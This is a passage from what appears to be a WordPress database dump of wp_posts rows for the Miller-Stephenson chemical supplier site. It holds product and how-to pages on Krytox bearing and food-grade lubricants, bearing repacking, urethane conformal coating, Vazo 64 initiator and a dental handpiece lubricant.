fan clutch bearing under these high temperature conditions.\r\n\r\n<strong>Alternator</strong>\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators and, hence, the bearings get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure. As the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation. This reduces the alternator’s performance and robs performance from the rest of the automobile. Perhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running.\r\n\r\nThe higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced and reliable, heat-stability and performance of Krytox™ greases.\r\n\r\n<strong>Clutch Pilot Automotive Bearing</strong>\r\n\r\nThe pilot bearings support the clutch-end of the transmission shaft. If the lubricant in the pilot bearing fails, the transmission itself will fail. Pilot bearings lubricated with Krytox™ high performance lubricants will last longer and perform better than those lubricated with other synthetic lubricants, due to the high-load capability and chemical inertness of Krytox™ products.\r\n\r\n<strong>Cooling Fan</strong>\r\n\r\nTo maximize performance, an automobile’s engine must run at its optimal temperature (typically around 93 °C [200 °F]), which is controlled by the cooling system. One component of the system is the cooling fan, which blows air through the radiator, removing excess heat. Failure in the cooling fan’s bearings leads to failure of the fan, which will eventually result in overheating of the engine. The sintered bearings used in cooling fans often fail in two ways: either the lubricant volatilizes, or it degrades through oxidation. The use of Krytox™ prevents both of these modes of failure, due to its low volatility and unsurpassed resistance to oxidation.\r\n\r\n<strong>Heavy Duty Truck Automatic Clutch</strong>\r\n\r\nIn many heavy duty trucks, the engines have a much lower rpm upper limit. In order to prevent the engine from being destroyed, an automatic clutch is used. When the set maximum rpm limit is reached, the automatic clutch disengages and notifies the driver to shift gears. This both prevents engine damage and increases ease of operation. The bearings present in the clutch are critical to its operation and must receive adequate lubrication in order to work properly. Lubricating with Krytox™ mid-range viscosity and low volatility lubricants reduces the chance that the bearings will fail with the frequent gear-shifting and high loads experienced throughout the extended driving life of these trucks.\r\n\r\nTo learn more about Krytox Automotive Non Bearing lubrication applications please <a href="https://www.miller-stephenson.com/krytox-automotive/">click here.</a>', 'Krytox Automotive Bearing Lubrication Applications', '', 'inherit', 'closed', 'closed', '', '2503-revision-v1', '', '', '2016-10-11 16:39:36', '2016-10-11 16:39:36', '', 2503, 'https://www.miller-stephenson.com/2503-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2507, 2, '2016-10-12 13:52:44', '2016-10-12 13:52:44', '<h1>How to prepare a bearing with Krytox™ Lubricants</h1>\r\n<h4><strong>Before You Start</strong></h4>\r\nDirt is one of a bearing’s worst enemies. That’s why it is so important to work in a clean area, with bearings and lubricants covered until ready for use. When handling bearings, wear clean elastomer gloves and use clean, lint-free rags. Compressed air, if used, should be filtered and dried. Do not spin a bearing with compressed air. Even though a bearing might not have grease or oil in it, it will have anti-rust preservatives that will prevent proper adhesion of Krytox™ lubricant, and the preservatives must be removed before filling the bearing. This guide explains how to prepare bearings with Krytox™ Lubricants.\r\n\r\nBefore adding Krytox™ grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used to protect it during storage. If left in the bearing, these hydrocarbon oils can form carbon\r\ndeposits at higher temperatures that may accelerate bearing failure.\r\n<h4><strong>1. Cleaning</strong></h4>\r\na. Remove the seal by carefully prying between it and the inner ring. Care should be taken to prevent the prying tool from coming in contact with any race pathway, the cage, or the rolling elements of the bearing. Shields normally cannot be removed from a bearing without causing damage; so, they are typically not good candidates for a lubricant change.\r\nb. Place the bearings in a clean wire basket and suspend the basket in a container of clean solvent. The solvent should be the type that dissolves or breaks down the particular type of lubricant in the bearing. Chlorinated solvents should be avoided, because they can leave chlorine that can cause corrosion. Fluorinated solvents are not required for hydrocarbon lubricants.\r\n\r\nc. The parts should be agitated in a bath or have the cleaning fluid pumped through the bearing to increase cleaning performance. An ultrasonic cleaner can also be used. If the parts cleaner is heated, the temperature should be maintained below the flash point of the solvent. Do not allow the solvent to get too contaminated, as cleaning effectiveness will be reduced.\r\n\r\nd. Dry the bearings by circulating warm air through the bearing or by heating to 93.3 °C (200 °F) for 10 minutes. Allow to cool to room temperature. The metal must be completely dry of all solvents, or the grease might not adhere properly and could cause the bearing to fail prematurely. Volatile solvents can also be used as a final rinse to remove heavier solvents, for speed drying, and to ensure the bearing is completely clean.\r\nHowever, volatile solvents are more flammable; so, caution must be used when handling them.\r\n\r\nAfter the bearing surfaces are clean, they should be lubricated/wiped with Krytox™ lubricant and properly stored to prevent corrosion. If they are not going to be packed with Krytox lubricant immediately, or if they are\r\ngoing to be in storage for an extended period, they can be dipped in Krytox™ ACW to coat the surface and protect against rust.\r\n<h4><strong>2. Repacking</strong></h4>\r\na. Cleaned bearings should be lubricated immediately with the specified lubricant. Rolling elements may be pre-lubricated with Krytox™ oil that has the same viscosity as the base oil in the grease. Lubricate each\r\nrolling element with a drop of oil and slowly rotate with a slight thrust by hand, so that the elements rotate to evenly spread the oil.\r\n\r\nb. The correct amount of grease should be weighed on a gram balance and transferred to a clean syringe. Remember that the specific gravity of Krytox™ grease is about 2.0 mg/L, and fill by volume rather than by weight.\r\n\r\nc. Once the syringe is packed with the correct amount of lubricant, inject half of the grease equally in each of the cavities between the rolling elements, from one side of the bearing. Repeat, using the remaining grease on the other side of the bearing.\r\n\r\nd. Rotate the bearing slowly by hand to spread and distribute the lubricant. Enough thrust should be applied by hand to cause the rolling elements to rotate.\r\n\r\ne. Replace seals or shields carefully to avoid causing damage that would allow the grease to leak out prematurely.\r\n<h4><strong>How much grease to put in a bearing?</strong></h4>\r\nProper lubrication is achieved by using the correct amount of grease. Too little grease in the bearings causes premature failure. Too much grease at the initial fill or during re-lubrication can cause overheating of bearings that are running at medium to high speed, resulting in bearing failure. The amount of grease put in the bearing depends on the application and operating speed.\r\n<ul>\r\n 	<li>For applications such as conveyor rollers and lowspeed machinery with DN values (inner race ID in mm x rpm) below 50,000, the bearing can be filled to about 60–75% of the free volume.</li>\r\n 	<li>For medium-speed applications, i.e., DN 50,000 to 200,000, the bearing can be filled 35–50%.</li>\r\n 	<li>For higher-speed systems, the fill is typically 25–35%.</li>\r\n 	<li>Some extreme-speed special applications have grease fills of only 10–15% (see Speed Factor for definition of DN values).</li>\r\n</ul>\r\nBecause Krytox™ grease is heavier than hydrocarbon lubricants, its higher density must be considered when determining the fill quantity by weight. Consult your bearing manufacturer for the capacity of the specific\r\nbearing you are using.\r\n\r\nTo ensure that another type of grease is not accidentally put into the bearing, grease fittings should be changed to a different style, such as button-head or pin type. A dedicated grease gun that matches the fitting should be used.\r\n<h4><strong>Speed Factor</strong></h4>\r\nThe speed factor (DN) indicates the permissible speed range for grease in a rolling bearing. The DN value is the inner race i.d. in millimeters multiplied by the RPM. DN values of 100,000 to 400,000 and higher have been achieved at temperatures of 204 °C to 260 °C (400°F to 500 °F) in actual field service using Krytox™ greases. At very high speeds, a special break-in run might be needed to spread the grease to avoid overheating.\r\n\r\nThe speed factor is affected by the base oil type, in addition to viscosity and thickener type, and is a measure of the lubricant’s internal friction. The limiting speed for grease-lubricated rolling bearings is dependent\r\non the type of bearing, its load, speed, precision, and lubrication system.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox/">For help with applications please click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'How to Prepare Bearings with Krytox™ Lubricants', '', 'publish', 'closed', 'closed', '', 'krytox-prepare-bearings', '', '', '2016-10-12 19:30:43', '2016-10-12 19:30:43', '', 0, 'https://www.miller-stephenson.com/?p=2507', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2508, 3, '2016-11-24 03:20:47', '2016-11-24 03:20:47', 'Miller-Stephenson\'s MS-470C Urethane Conformal Coatings offer superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear, their hardness is second only to epoxy conformal coatings. However urethanes are much easier to be reworked than an epoxy. Miller-Stephenson\'s Urethane Conformal Coatings have the following benefits:\n<ul>\n 	<li>Reworkable and room temperature cure</li>\n 	<li>Solvent and discoloration resistant</li>\n 	<li>Fluorescent under UV light</li>\n 	<li>No cracking or crazing with vibration</li>\n</ul>\nPolyurethane coatings are available as either aerosol or bulk formulations. Both formulations provide excellent humidity resistance and far greater chemical resistance than Acrylic coatings. These Spray Conformal Coating are Single component Polyurethanes, while easy to apply, enjoy long pot life but sometimes require very lengthy cure cycles to achieve full or optimum cure. The cure cycle can be accelerated by the application of heat typically reducing cure times to less than 4-5 hours at 50% humidity.\n\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. MS-470C will cover 8.6 square feet at a 2-mil thickness per 14-oz. aerosol can.  MS-472C, the bulk liquid version of the product, is available in quarts and gallons for dip, brush, or spray applications and will cover 120 square feet per gallon at a 2-mil thickness. Printed circuit boards or electronics covered with urethane coating are repairable.  Simply heat the coating with a soldering iron to remove the components.\n\nUrethane Conformal Coatings provide a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\n\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>\n\nMore than a world-class materials supplier, Miller-Stephenson is an expert and dedicated collaborator. If our product finder cannot identify an off-the-shelf solution that meets your precise specifications or if you are looking for application expertise and support please <a href="https://www.miller-stephenson.com/tech-support/">contact us</a>.', 'MS-470C', 'Miller-Stephenson&#039;s Urethane Conformal Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear, their hardness is second only to epoxy conformal coatings. However urethanes are much easier to be reworked than an epoxy. Miller-Stephenson&#039;s Urethane Conformal Coating have the following benefits:\n<ul>\n 	<li>Superior toughness and abrasion resistance</li>\n 	<li>Reworkable and room temperature cure</li>\n 	<li>Solvent and discoloration resistant</li>\n 	<li>Fluorescent under UV light</li>\n 	<li>No cracking or crazing with vibration</li>\n</ul>', 'inherit', 'closed', 'closed', '', '735-autosave-v1', '', '', '2016-11-24 03:20:47', '2016-11-24 03:20:47', '', 735, 'https://www.miller-stephenson.com/735-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2509, 3, '2017-06-05 13:07:57', '2017-06-05 13:07:57', '<h2>VAZO 64 | Azobisisobutyronitrile</h2>\n<h3>AIBN Free Radical Initiator; Reliable, Predictable In</h3>\nVAZO 64 radical initiator, also known as AIBN (Azobisisobutyronitrile), is a free radical azo initiator typically used as a polymerization initiator. VAZO 64 radical initiator is one of the most widely used initiators, which thermally decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity. Its low molecular weight allows it to be one of the most cost effective options, with a higher mole per pound than other initiators.  Benefits include:\n<ul>\n 	<li>Very Cost Effective</li>\n 	<li>Does not compete in costly sides reactions</li>\n 	<li>Head-to-Tail polymerization; Low polydispersity</li>\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\n 	<li>Can polymerize oxidation susceptible compound</li>\n</ul>\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\n\nAll the grades are Vazo radical Initiators are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 67 is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\n<p class="largeText">Solvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.</p>\n\n<ul>\n 	<li>\n<div>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</div></li>\n 	<li>\n<div>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</div></li>\n 	<li>\n<div>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</div></li>\n 	<li>\n<div>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</div></li>\n 	<li>\n<div>Are available in four grades to use over a wide temperature range.</div></li>\n</ul>\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]);', 'VAZO 64 | Azobisisobutyronitrile', 'Vazo 64, also known as AIBN (Azobisisobutyronitrile), is a free radical source (FRS) typically used as a polymerization initiator. Vazo 64 is one of the most widely used initiators, which thermally decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity. Its low molecular weight allows it to be one of the most cost effective options, with a higher mole per pound than other initiators. Vazo 64 is mainly used to start acrylic polymerization reactions in industrial settings.  Benefits include:\n<ul>\n 	<li>Very Cost Effective</li>\n 	<li>Does not compete in costly sides reactions</li>\n 	<li>Head-to-Tail polymerization; Low polydispersity</li>\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\n 	<li>Can polymerize oxidation susceptible compound</li>\n</ul>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/vazo-frs-product-banner-e1474375765567.jpg" alt="Vazo Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '427-autosave-v1', '', '', '2017-06-05 13:07:57', '2017-06-05 13:07:57', '', 427, 'https://www.miller-stephenson.com/427-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2513, 0, '2016-10-11 22:55:08', '2016-10-11 22:55:08', '', '', '', 'publish', 'closed', 'closed', '', '2513', '', '', '2016-10-11 22:55:08', '2016-10-11 22:55:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/2513/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2514, 0, '2016-10-12 08:39:38', '2016-10-12 08:39:38', '', '', '', 'publish', 'closed', 'closed', '', '2514', '', '', '2016-10-12 08:39:38', '2016-10-12 08:39:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/2514/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2515, 2, '2016-10-12 12:35:55', '2016-10-12 12:35:55', '<h2><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></h2>\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n<h3><strong>Product Description</strong></h3>\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>\r\n[ux_product_categories ids="12" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricant/">Click here</a> to find out more about these Dental Handpiece Lubricants.', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-10-12 12:35:55', '2016-10-12 12:35:55', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2516, 2, '2016-10-12 19:34:03', '2016-10-12 19:34:03', '<h1><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> NSF H-1 Food Grade Lubricants - Safe for Incidental Food Contact</strong></h1>\nChoosing the right lubricant for your equipment just got a lot easier with H-1 certified Krytox™ food grade lubricants from Miller-Stephenson.\n\nAs with the full line of Krytox™ lubricants, Krytox™ oils and greases deliver superior performance with advanced features of high-temperature stability, nonflammability, and chemical and biological inertness. Krytox lubricants will not carbonize or form gummy deposits that typically cause failures, nor will they evaporate. Therefore, maintenance costs can be significantly reduced.\n\nThe composition of Krytox™ lubricants allows them to function in a wide range of operating temperatures and chemical environments. Krytox™ food grade lubricants will not break down under mechanical stress. The oils are clear, colorless, and odorless, and the grease is white.\n\nKrytox lubricants comply fully with USDA performance standards for designated uses. These lubricant products are not intended to be used as direct food additives. Use Krytox™ oils and greases whenever a long-lasting, tenacious, chemically inert lubricant is needed for your demanding applications.\n<h2>Stability and Compatibility</h2>\nKrytox™ oils contain only carbon, oxygen, and fluorine. The oils will not burn or support combustion, even in 100% liquid or gaseous oxygen. They are chemically inert and will not break\ndown in the presence of most chemicals.\n\nBecause Krytox™ food grade lubricants are essentially inert, they are safe to use with most metals, plastics, and seal materials, and they are completely resistant to water and steam. Krytox™ lubricants protect bearings and other components under a wide range of load and speed conditions. Components run quieter, and wear protection is extended. Krytox™ lubricants will not break down under extreme pressure or high mechanical stress.\n\nVarious grades of Krytox™ food grade lubricants are serviceable for long periods of time at continuous temperatures between –60–300 °C (–58–600 °F). There are also special grades that can routinely handle temperatures of 350 °C (662 °F) and withstand peaks up to 400 °C (752 °F) for shorter periods of time.\n\nUse Krytox™ lubricants on chains, bearings, valves, seals, or any place a long-lasting lubricant is needed.\n<h2>Safety and Environmental Protection</h2>\nUsing Krytox™ greases and oils:\n<ul>\n 	<li>Reduces the need for hydrocarbon lubricants</li>\n 	<li>Helps allay any concerns about emissions or other potential environmental impact</li>\n 	<li>Avoids the inconvenience and cost associated with the disposal of hydrocarbon-based oils and greases.</li>\n</ul>\nKrytox™ greases and oils are non-toxic, easy to handle, and do not release volatile organic compounds to the atmosphere. Additionally, Chemours has a regeneration program that reclaims used oil and restores it to its original properties. This lowers the overall cost of lubrication, and eliminates safety and environmental disposal problems.\n\n<img class="alignnone wp-image-2443" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-Hydrocarbon.jpg" alt="krytox-hydrocarbon" width="349" height="364" />\n<h2>Benefits in Use</h2>\nThe extended life you will see with Krytox™ lubricants means longer re-lubrication intervals, less maintenance, and improved cleanliness. The overall superior stability of Krytox™ lubricants also can result in less downtime and fewer failures due to lubricant carbonization, evaporation, or other deterioration. Water washout and steam cleaning will not affect Krytox™ lubricants. In addition, because Krytox™ lubricants can be used in many applications and last so long, your total lubricant inventory can be reduced, as well as the need for frequent movement of drums around your facility.\n\nThe combination of all of these factors translates to long-term cost savings for your business.\n\n<img class="alignnone size-medium wp-image-2444" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/krytox-comparison-800x311.jpg" alt="krytox-comparison" width="800" height="311" />\n<h2>Applications for Krytox H-1 Food Grade Lubricants</h2>\n<table width="868">\n<tbody>\n<tr>\n<td width="250"><strong>Type</strong></td>\n<td width="206"><strong>Products</strong></td>\n<td width="206"><strong>Application</strong></td>\n<td width="206"><strong>Comments</strong></td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/">Multipurpose Greases</a></td>\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-202/">Krytox GPL 202</a>\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-203/">Krytox GPL 203</a>\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox GPL 205</a>\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Krytox GPL 206</a></td>\n<td>Bearings, valves, seals, O-rings</td>\n<td>For non-corrosive environments at standard operating temperatures</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">Anti-Corrosion Greases</a></td>\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-223/">Krytox GPL 223</a>\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox GPL 225</a>\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-226/">Krytox GPL 226</a>\nKrytox FG 34</td>\n<td>Bearings, valves, seals, O-rings</td>\n<td>For non-corrosive environments at standard operating temperatures</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/">High-Temperature Greases</a></td>\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-xht-sx/">Krytox XHT-SX</a>\n<a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox XHT-AC</a>\n<a href="https://www.miller-stephenson.com/product/krytox-xht-acx/">Krytox XHT-ACX</a></td>\n<td>Bearings and chains</td>\n<td>Krytox XHT-AC and ACX contain corrosion inhibitor</td>\n</tr>\n<tr>\n<td width="250">Lubricating Oils</td>\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox GPL 105</a>\n<a href="https://www.miller-stephenson.com/product/xht-500/">Krytox XHT-500</a>\n<a href="https://www.miller-stephenson.com/product/xp-1a5/">Krytox XP-1A5</a>\nKrytox FG 40</td>\n<td>Chains, compressors, bearings, gear boxes</td>\n<td>Krytox XHT-500 is formulated for high temperatures; Krytox XP-1A5 contains corrosion inhibitor</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-vpf-1506/">Krytox 1506</a>\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox 1514</a>\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1525/">Krytox 1525</a></td>\n<td>Mechanical pumps</td>\n<td></td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n[ux_product_categories ids="46,115,38" number="10"]', 'Krytox™ H-1 Food Grade Lubricants', '', 'inherit', 'closed', 'closed', '', '2442-autosave-v1', '', '', '2016-10-12 19:34:03', '2016-10-12 19:34:03', '', 2442, 'https://www.miller-stephenson.com/2442-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2517, 2, '2016-10-12 12:47:17', '2016-10-12 12:47:17', '<h1><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox</a> NSF H-1 Food Grade Lubricants - Safe for Incidental Food Contact</strong></h1>\r\nChoosing the right lubricant for your equipment just got a lot easier with H-1 certified Krytox food grade lubricants from Miller-Stephenson.\r\n\r\nAs with the full line of Krytox lubricants, Krytox oils and greases deliver superior performance with advanced features of high-temperature stability, nonflammability, and chemical and biological inertness. Krytox lubricants will not carbonize or form gummy deposits that typically cause failures, nor will they evaporate. Therefore, maintenance costs can be significantly reduced.\r\n\r\nThe composition of Krytox lubricants allows them to function in a wide range of operating temperatures and chemical environments. Krytox food grade lubricants will not break down under mechanical stress. The oils are clear, colorless, and odorless, and the grease is white.\r\n\r\nKrytox lubricants comply fully with USDA performance standards for designated uses. These lubricant products are not intended to be used as direct food additives. Use Krytox oils and greases whenever a long-lasting, tenacious, chemically inert lubricant is needed for your demanding applications.\r\n<h2>Stability and Compatibility</h2>\r\nKrytox oils contain only carbon, oxygen, and fluorine. The oils will not burn or support combustion, even in 100% liquid or gaseous oxygen. They are chemically inert and will not break\r\ndown in the presence of most chemicals.\r\n\r\nBecause Krytox food grade lubricants are essentially inert, they are safe to use with most metals, plastics, and seal materials, and they are completely resistant to water and steam. Krytox lubricants protect bearings and other components under a wide range of load and speed conditions. Components run quieter, and wear protection is extended. Krytox lubricants will not break down under extreme pressure or high mechanical stress.\r\n\r\nVarious grades of Krytox food grade lubricants are serviceable for long periods of time at continuous temperatures between –60–300 °C (–58–600 °F). There are also special grades that can routinely handle temperatures of 350 °C (662 °F) and withstand peaks up to 400 °C (752 °F) for shorter periods of time.\r\n\r\nUse Krytox lubricants on chains, bearings, valves, seals, or any place a long-lasting lubricant is needed.\r\n<h2>Safety and Environmental Protection</h2>\r\nUsing Krytox greases and oils:\r\n<ul>\r\n 	<li>Reduces the need for hydrocarbon lubricants</li>\r\n 	<li>Helps allay any concerns about emissions or other potential environmental impact</li>\r\n 	<li>Avoids the inconvenience and cost associated with the disposal of hydrocarbon-based oils and greases.</li>\r\n</ul>\r\nKrytox greases and oils are non-toxic, easy to handle, and do not release volatile organic compounds to the atmosphere. Additionally, Chemours has a regeneration program that reclaims used oil and restores it to its original properties. This lowers the overall cost of lubrication, and eliminates safety and environmental disposal problems.\r\n\r\n<img class="alignnone wp-image-2443" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-Hydrocarbon.jpg" alt="krytox-hydrocarbon" width="349" height="364" />\r\n<h2>Benefits in Use</h2>\r\nThe extended life you will see with Krytox lubricants means longer re-lubrication intervals, less maintenance, and improved cleanliness. The overall superior stability of Krytox lubricants also can result in less downtime and fewer failures due to lubricant carbonization, evaporation, or other deterioration. Water washout and steam cleaning will not affect Krytox lubricants. In addition, because Krytox lubricants can be used in many applications and last so long, your total lubricant inventory can be reduced, as well as the need for frequent movement of drums around your facility.\r\n\r\nThe combination of all of these factors translates to long-term cost savings for your business.\r\n\r\n<img class="alignnone size-medium wp-image-2444" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/krytox-comparison-800x311.jpg" alt="krytox-comparison" width="800" height="311" />\r\n<h2>Applications for Krytox H-1 Food Grade Lubricants</h2>\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Type</strong></td>\r\n<td width="206"><strong>Products</strong></td>\r\n<td width="206"><strong>Application</strong></td>\r\n<td width="206"><strong>Comments</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/">Multipurpose Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-202/">Krytox GPL 202</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-203/">Krytox GPL 203</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox GPL 205</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Krytox GPL 206</a></td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">Anti-Corrosion Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-223/">Krytox GPL 223</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox GPL 225</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-226/">Krytox GPL 226</a>\r\nKrytox FG 34</td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/">High-Temperature Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-xht-sx/">Krytox XHT-SX</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox XHT-AC</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-acx/">Krytox XHT-ACX</a></td>\r\n<td>Bearings and chains</td>\r\n<td>Krytox XHT-AC and ACX contain corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Lubricating Oils</td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox GPL 105</a>\r\n<a href="https://www.miller-stephenson.com/product/xht-500/">Krytox XHT-500</a>\r\n<a href="https://www.miller-stephenson.com/product/xp-1a5/">Krytox XP-1A5</a>\r\nKrytox FG 40</td>\r\n<td>Chains, compressors, bearings, gear boxes</td>\r\n<td>Krytox XHT-500 is formulated for high temperatures; Krytox XP-1A5 contains corrosion 